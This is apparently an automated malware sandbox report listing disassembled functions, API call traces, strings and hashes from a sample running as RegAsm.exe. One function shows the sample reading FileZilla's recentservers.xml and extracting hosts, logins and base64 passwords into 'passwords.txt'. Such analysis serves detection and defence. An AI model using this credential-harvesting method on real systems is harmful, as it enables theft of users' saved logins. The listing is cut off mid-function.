Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf41f3b5669224c1154e9b2a92fe1b82126ef762f8275621b626f57154db146f
Instruction ID: 88ea5a56f3987ec51276e5fe3174a7d5c735acea4feb18bc35a15f725de6d5db
Opcode Fuzzy Hash: bf41f3b5669224c1154e9b2a92fe1b82126ef762f8275621b626f57154db146f
Instruction Fuzzy Hash: 62110471904563ABD312AB24D940B56F7E1BF68324F698668FC499BAE0D321F860C7D1

Function 00410DAC Relevance: 6.1, APIs: 4, Instructions: 53memoryencryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 00410DD0
GetProcessHeap.KERNEL32(00000000,?,?,00404415,?,?,?,?,?,?), ref: 00410DDD
HeapAlloc.KERNEL32(00000000,?,00404415,?,?,?,?,?,?), ref: 00410DE4

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocBinaryCryptProcessString
String ID:
API String ID: 1871034439-0
Opcode ID: ad0991718ef18b2bf8ef03264dcc82093b956574455e5d0286dcdbe0f337aa8f
Instruction ID: 533e96b164cb0d967d7948213eb188af149c3bb85dd902e70f95414ccdf186b2
Opcode Fuzzy Hash: ad0991718ef18b2bf8ef03264dcc82093b956574455e5d0286dcdbe0f337aa8f
Instruction Fuzzy Hash: C2016931500209FFDF118FA5EC449EBBBAEFF4A350B104429F90193210D7759C91EB60

Function 00406242 Relevance: 6.0, APIs: 4, Instructions: 48encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004058F9,00000000,00000000), ref: 00406262
LocalAlloc.KERNEL32(00000040,004058F9,?,?,004058F9,00000000,?,?), ref: 00406270
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004058F9,00000000,00000000), ref: 00406286
LocalFree.KERNEL32(00000000,?,?,004058F9,00000000,?,?), ref: 00406295

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID:
API String ID: 4291131564-0
Opcode ID: 5e238f24b81681bd1e218dc304b4b0d5aee478eb474be9148ccb694fddff89b6
Instruction ID: 7cbb48460589e96c39e43793b365f6781130aaaa1b7fd363564d70c00da41937
Opcode Fuzzy Hash: 5e238f24b81681bd1e218dc304b4b0d5aee478eb474be9148ccb694fddff89b6
Instruction Fuzzy Hash: BD01E874101234BFDB215F56DC88E8B7FB9EF4ABA0B104455FA09A6250D3719910DBB0

Function 192F3770 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4ccdf9b743d75f8252b2851f4553c50142fb9d6052622b86404dbf4ff0d5e94
Instruction ID: 3504b3ac77f3f2eb88a6b52542d1c3ea115c2be117a72f69e75347f293f3b6c8
Opcode Fuzzy Hash: f4ccdf9b743d75f8252b2851f4553c50142fb9d6052622b86404dbf4ff0d5e94
Instruction Fuzzy Hash: E6E0BF75004700BFCA129F60DD46E4BBFB6BF4C711F595D18F5C521571C772A960AB42

Function 193137E0 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 163b20eed04c21f543b465dbf508e26d1b36e382aec2e71a79acdea727c2a907
Instruction ID: 8d8de452ac6b95eea49dfd9d97cc632cf1438d68e4db3f210e49cb58c0f3034a
Opcode Fuzzy Hash: 163b20eed04c21f543b465dbf508e26d1b36e382aec2e71a79acdea727c2a907
Instruction Fuzzy Hash: 5AE04F75004340BFCB129F21CC40E4BBFB2BF4C315F495C08F18420030C3B2A9A1AB42

Function 192D5910 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

Strings

INSERT INTO '%q'.'%q_idx'(segid,term,pgno) VALUES(?,?,?), xrefs: 192D597E

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: INSERT INTO '%q'.'%q_idx'(segid,term,pgno) VALUES(?,?,?)
API String ID: 0-143322027
Opcode ID: 6171ecd89f76c41934a2075b3587cf1e605230067a717ffbab67c1b4c5bc041c
Instruction ID: 6425362794eae7623b4624110b216b371153d3367368cac2d70eee1fcbfd12ed
Opcode Fuzzy Hash: 6171ecd89f76c41934a2075b3587cf1e605230067a717ffbab67c1b4c5bc041c
Instruction Fuzzy Hash: 651159B6500606BFE710DF58CC84F86BBADFF49314F449544F6089B292C3B2B5A4CBA1

Function 192ED3B0 Relevance: 4.6, APIs: 3, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d7374e24c1cb1af610c8e5ff1afcecf5dd1a536eafa8a460db8c800a811ef7e
Instruction ID: 22165c5fdecefc77dcc09069ae3e9a4c35e846e44620d64b613be3e8f786d5de
Opcode Fuzzy Hash: 1d7374e24c1cb1af610c8e5ff1afcecf5dd1a536eafa8a460db8c800a811ef7e
Instruction Fuzzy Hash: BE3189B4600206ABE704DF2DED80F66B3E9FF58215F588628F949D7381E771F914CAA1

Function 192D55B0 Relevance: 4.6, APIs: 3, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 226d8528258fb4320cec8db8315105988d4f685c57fcbfaaf22920a5e28dd476
Instruction ID: 1c4652308dfa7f0de7c38ff0d74fde87c1b66671b76c477b3b068573b8bd0d36
Opcode Fuzzy Hash: 226d8528258fb4320cec8db8315105988d4f685c57fcbfaaf22920a5e28dd476
Instruction Fuzzy Hash: CA318DB5500342AFEB10CF26DC84F1777E9EF84304F288829F9458B295D7B1E950CBA1

Function 0040E2FF Relevance: 93.4, APIs: 62, Instructions: 416memorystringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040E304

Part of subcall function 0040E204: _EH_prolog.MSVCRT ref: 0040E209
Part of subcall function 0040E204: lstrlenA.KERNEL32(?,6CDC7FA0,75AA5460,00000000), ref: 0040E22D
Part of subcall function 0040E204: strchr.MSVCRT ref: 0040E23F

GetProcessHeap.KERNEL32(00000008,?,?,6CDC7FA0,00000000), ref: 0040E353
HeapAlloc.KERNEL32(00000000,?,6CDC7FA0,00000000), ref: 0040E35A
GetProcessHeap.KERNEL32(00000000,?,?,6CDC7FA0,00000000), ref: 0040E36F
HeapFree.KERNEL32(00000000,?,6CDC7FA0,00000000), ref: 0040E376
strcpy_s.MSVCRT ref: 0040E3AF
GetProcessHeap.KERNEL32(00000000,?,?,?,75AA5460,?,6CDC7FA0,00000000), ref: 0040E3C6
HeapFree.KERNEL32(00000000,?,?,75AA5460,?,6CDC7FA0,00000000), ref: 0040E3CD
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,75AA5460,?,6CDC7FA0,00000000), ref: 0040E3F3
HeapFree.KERNEL32(00000000,?,?,?,?,?,75AA5460,?,6CDC7FA0,00000000), ref: 0040E3FA
GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,75AA5460,?,6CDC7FA0,00000000), ref: 0040E401
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,75AA5460,?,6CDC7FA0,00000000), ref: 0040E408
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,75AA5460,?,6CDC7FA0,00000000), ref: 0040E41D
HeapFree.KERNEL32(00000000,?,?,?,?,?,75AA5460,?,6CDC7FA0,00000000), ref: 0040E424
strcpy_s.MSVCRT ref: 0040E437
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,75AA5460,?,6CDC7FA0,00000000), ref: 0040E448
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,75AA5460,?,6CDC7FA0,00000000), ref: 0040E44F
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,75AA5460,?,6CDC7FA0), ref: 0040E46A
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,75AA5460,?,6CDC7FA0,00000000), ref: 0040E471
GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,75AA5460,?,6CDC7FA0), ref: 0040E478
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,75AA5460,?,6CDC7FA0,00000000), ref: 0040E47F
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,75AA5460,?,6CDC7FA0), ref: 0040E494
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,75AA5460,?,6CDC7FA0,00000000), ref: 0040E49B
strcpy_s.MSVCRT ref: 0040E4AE
GetProcessHeap.KERNEL32(00000000,?), ref: 0040E4BF
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,75AA5460), ref: 0040E4C6
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,75AA5460,?,6CDC7FA0,00000000), ref: 0040E4E8
HeapFree.KERNEL32(00000000,?,?,?,?,?,75AA5460,?,6CDC7FA0,00000000), ref: 0040E4EF
GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,75AA5460,?,6CDC7FA0,00000000), ref: 0040E4F6
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,75AA5460,?,6CDC7FA0,00000000), ref: 0040E4FD
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,75AA5460,?,6CDC7FA0,00000000), ref: 0040E515
HeapFree.KERNEL32(00000000,?,?,?,?,?,75AA5460,?,6CDC7FA0,00000000), ref: 0040E51C
strcpy_s.MSVCRT ref: 0040E52F
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,75AA5460,?,6CDC7FA0,00000000), ref: 0040E540
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,75AA5460,?,6CDC7FA0,00000000), ref: 0040E547

Part of subcall function 0040E156: strlen.MSVCRT ref: 0040E16D

lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,75AA5460,?,6CDC7FA0,00000000), ref: 0040E550
GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,?,?,?,?,75AA5460,?,6CDC7FA0,00000000), ref: 0040E560
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,75AA5460,?,6CDC7FA0,00000000), ref: 0040E567
lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,75AA5460,?,6CDC7FA0,00000000), ref: 0040E593
strcpy_s.MSVCRT ref: 0040E5B7
GetProcessHeap.KERNEL32(00000000,?,00000001,00000000,00000001,00000000,?,?,00000000), ref: 0040E5E0
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,75AA5460,?,6CDC7FA0,00000000), ref: 0040E5E7
lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,75AA5460,?,6CDC7FA0,00000000), ref: 0040E5EC
GetProcessHeap.KERNEL32(00000008,00000001,?,?,?,?,?,?,?,?,75AA5460,?,6CDC7FA0,00000000), ref: 0040E5F7
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,75AA5460,?,6CDC7FA0,00000000), ref: 0040E5FE
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,75AA5460,?,6CDC7FA0,00000000), ref: 0040E60F
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,75AA5460,?,6CDC7FA0,00000000), ref: 0040E616
strcpy_s.MSVCRT ref: 0040E624
GetProcessHeap.KERNEL32(00000000,?), ref: 0040E630
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,75AA5460), ref: 0040E637
GetProcessHeap.KERNEL32(00000000,?), ref: 0040E65D
HeapFree.KERNEL32(00000000), ref: 0040E664
GetProcessHeap.KERNEL32(00000008,00000010), ref: 0040E66B
HeapAlloc.KERNEL32(00000000), ref: 0040E672
strcpy_s.MSVCRT ref: 0040E68A
GetProcessHeap.KERNEL32(00000000,?), ref: 0040E69B
HeapFree.KERNEL32(00000000), ref: 0040E6A2
strlen.MSVCRT ref: 0040E6F0
GetProcessHeap.KERNEL32(00000000,?), ref: 0040E734
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,75AA5460), ref: 0040E73B

Part of subcall function 0040E204: strchr.MSVCRT ref: 0040E263
Part of subcall function 0040E204: lstrlenA.KERNEL32(?), ref: 0040E281
Part of subcall function 0040E204: GetProcessHeap.KERNEL32(00000008,-00000001), ref: 0040E28E
Part of subcall function 0040E204: HeapAlloc.KERNEL32(00000000), ref: 0040E295
Part of subcall function 0040E204: strcpy_s.MSVCRT ref: 0040E2D0

GetProcessHeap.KERNEL32(00000000,?), ref: 0040E787
HeapFree.KERNEL32(00000000), ref: 0040E78E

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$Allocstrcpy_s$lstrlen$H_prologstrchrstrlen
String ID:
API String ID: 2599614518-0
Opcode ID: bb227fb70db15008d3506cb77bd3e0cb2fe7a7ddd98e963f33a7b57713678ad7
Instruction ID: 7e0a7a5bace357342d00c61117c8909c4cf2bcd29efc52d906f0802e33e35782
Opcode Fuzzy Hash: bb227fb70db15008d3506cb77bd3e0cb2fe7a7ddd98e963f33a7b57713678ad7
Instruction Fuzzy Hash: A5E13AB1C0021AAFDF11AFE1DD49AAFBB79FF08304F10082AF615B2191DB794A54DB65

Function 0040BBE8 Relevance: 73.9, APIs: 32, Strings: 10, Instructions: 370stringmemoryCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040BBED

Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D

Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D52

Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83

Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A

Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB

Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980

Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221

Part of subcall function 00410D6D: LocalAlloc.KERNEL32(00000040,004131CC,000000C8,00000001,?,004131CB,00000000,00000000), ref: 00410D86

strtok_s.MSVCRT ref: 0040BCCB
GetProcessHeap.KERNEL32(00000000,000F423F,00425C9B,00425C9A,00425C97,00425C96), ref: 0040BD1F
HeapAlloc.KERNEL32(00000000), ref: 0040BD26
StrStrA.SHLWAPI(00000000,<Host>), ref: 0040BD3A
lstrlenA.KERNEL32(00000000), ref: 0040BD45
StrStrA.SHLWAPI(00000000,<Port>), ref: 0040BD7D
lstrlenA.KERNEL32(00000000), ref: 0040BD88
StrStrA.SHLWAPI(00000000,<User>), ref: 0040BDC6
lstrlenA.KERNEL32(00000000), ref: 0040BDD1
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040BE0F
lstrlenA.KERNEL32(00000000), ref: 0040BE1E
lstrlenA.KERNEL32(?), ref: 0040C019

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA

memset.MSVCRT ref: 0040C06C

Strings

Host: , xrefs: 0040BF0F
Login: , xrefs: 0040BF5D
Password: , xrefs: 0040BF8B
<User>, xrefs: 0040BDC0
<Pass encoding="base64">, xrefs: 0040BE09
Soft: FileZilla, xrefs: 0040BF01
passwords.txt, xrefs: 0040C02B
<Host>, xrefs: 0040BD34
<Port>, xrefs: 0040BD77
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 0040BC5A

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologlstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitmemsetstrtok_s
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
API String ID: 486015307-935134978
Opcode ID: 475558dbd63262fa8b5edd16cf3787f7b3d4e8ce95bcb59c91448d3cb0a5b499
Instruction ID: 255c4b719d3f0515adc493bcbacf9bf61407d1e7a5812a7bdcdf9b10872d254a
Opcode Fuzzy Hash: 475558dbd63262fa8b5edd16cf3787f7b3d4e8ce95bcb59c91448d3cb0a5b499
Instruction Fuzzy Hash: DEE18F71900258EADB11EBE1DC56FEEBB78AF19304F50007AF505B21D2EF781A08CB69

Function 0040E7B8 Relevance: 63.4, APIs: 22, Strings: 14, Instructions: 411registryCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040E7BD
memset.MSVCRT ref: 0040E7E6
memset.MSVCRT ref: 0040E806
memset.MSVCRT ref: 0040E81A
memset.MSVCRT ref: 0040E82E
